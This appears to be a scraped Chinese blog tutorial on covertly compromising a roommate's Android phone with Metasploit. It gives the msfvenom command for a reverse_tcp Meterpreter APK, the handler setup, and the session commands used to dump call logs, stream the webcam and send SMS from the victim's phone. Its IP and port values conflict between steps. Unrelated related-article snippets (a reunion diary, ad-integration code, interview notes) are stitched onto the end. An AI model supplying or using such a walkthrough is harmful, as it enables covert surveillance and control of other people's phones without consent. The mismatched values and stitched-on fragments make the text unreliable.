实战Metasploit之安卓渗透舍友

转自http://www.secist.com/archives/1193.html

安卓手机在移动端占有很高的比重,今天就带领大家一块利用Metasploit进行一次渗透之旅,安卓渗透和windows其实差不多的,好啦,不废话了,正题开始。

环境:kali linux 2016.02和安卓手机一部

准备工作:当然是查看自己的ip啦~

正式开始:

首先,生成一个反弹木马:在终端输入

 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.104 lport=44444 r>/root/123.apk

-p  是Payload to use

Lhost  攻击者的ip,就是自己的ip

Lport  攻击者的端口,(有高端口可能不是很容易被杀的一说,本人没证实)

r>/root/123.apk 文件生成的路径及文件名

然后就是搭建自己的客户端。

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

可以用指令 show options 查看我们所需要写的参数

这里我们可以看到,只需要更改lhost 和lport的参数。

set lhost 192.168.0.104

set lport 4444

执行Exploit指令

手机连接成功……接下来~~

首先看看手机是否经过root    check_root

结果发现这部机子root过

dump_calllog    通话记录

(这是我看到的信息)

webcam_stream   调用摄相头

最后顺便黑一下舍友,给他发一个消息

Send_sms -d 电话 -t 内容

有没有很简单呢~嗯~其实还有好多功能了,在这不一一列举了,大家自己发现吧~

即刻安全 ? 实战Metasploit之安卓渗透舍友

时间: 2024-10-08 00:52:32

实战Metasploit之安卓渗透舍友的相关文章

舍友聚会

这两天与高职时代的舍友聚了聚,喝了不少啤酒= =其实并不怎么喜欢喝酒,喝酒伤身嘛.可是人聚会时就是会开那么些酒.喝酒不吃饭可能等于白吃一场吧! 感觉已经进了社会,相别3年,还能因为一次提议聚到一起,也是挺不容易的.我已经很久没有笑到眼泪出来,笑到除了笑就干不动别的事的时候了.可能因为那时笑多了吧,现在上班时同事看我,也会说,怎么时时刻刻看你你都那么开心哦! 玩了玩lol,玩的过程中,CL说,一群人的娱乐这么多年也没什么长进,还以为出学校几年,夜生活可以进化成去酒吧,去浴室.按摩店什么什么的呢……

COCOS2D-X编译成安卓APP添加友盟统计和百度广告的代码示例

对初学者很多都会遇到这个问题,经常加统计代码或广告代码的时候会出错, 这里从安卓代码和C++代码分别说明,限于篇幅,其他步骤请参考相关的配置说明文档. 自己搜了很多代码,发很多心思调试整理,代码都调试通过,为了方便大家,直接献上所有源代码, 大家直接COPY用就可以了. 1.安卓代码示例 为了能够用JNI调用JAVA代码显示广告,需要设计一个类,提供调用广告的接口 这个类叫:ShowAdHelper package org.cocos2dx.cpp; import android.os.Hand

metasploit利用漏洞渗透攻击靶机

1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁. 如图1,kali的IP为:192.168.19.128 如图2:靶机的IP:

我的本科舍友到研究生舍友

“要是损害到我,我就打电话告诉辅导员.他妈的你是小学生吗!” 倒像极了本科的室友:“再打呼噜就报警!” 我他妈到是呵呵了.给你们一句诺言:“我不会损害任何人,也不会自暴自弃.因为(狗)苟且偷生,生命不易.” 有些人,就他妈的有公主病,得一大群人围着他转.我他妈的走还不行吗.不想跟你们交朋友不行吗!

metasploit在内网渗透中的一些模块

下面附上内网渗透中可能用得上的msf 模块 scanner/portscan/syn                   SYN端口扫描scanner/portscan/tcp                    TCP端口扫描 auxiliary/scanner/smb/smb_login       SMB登录测试扫描use windows/smb/psexec             SMB登录,可用hash登录auxiliary/scanner/smb/smb_version     

舍友java开发面经

阿里: 一面 项目经验科研项目介绍为什么那么做自己创新点 安卓acitivity生命周期https://blog.csdn.net/android_tutor/article/details/5772285service 如何保活 javaHashMap,currentHashMap,linkedlist对比 从用法,同步安全角度解答http://www.cnblogs.com/chengxiao/p/6059914.html?tdsourcetag=s_pctim_aiomsghttps://

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

metasploit渗透初探MR.robot(一)

看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstation-win 下载vm版本kali linux,https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vm-amd64.7z metasploit是一个渗透测试工具,在kali linux中有不少网络安全测试工具,

Github上安卓榜排名第2的程序员教你如何学习【转载,侵删】

来自:峰瑞资本(微信号:freesvc)文章作者:代码家(微信 ID:daimajia_share) 软件早已吞噬整个世界,程序员是关键角色.过去 40 年中,许多伟大的公司都由程序员缔造,比如比尔·盖茨.拉里·埃里森.马克·扎克伯格.伊隆·马斯克. 一本哥哥不太关心的 Visual Basic 课外书,代码家如获至宝,他接触了简单的代码,这让他进入到一个全新的世界.从那之后,代码家一直享受着用代码解决问题过程中产生的精神愉悦,并成长为一名专家级程序员.用行话说,黑客.现在,代码家是 Githu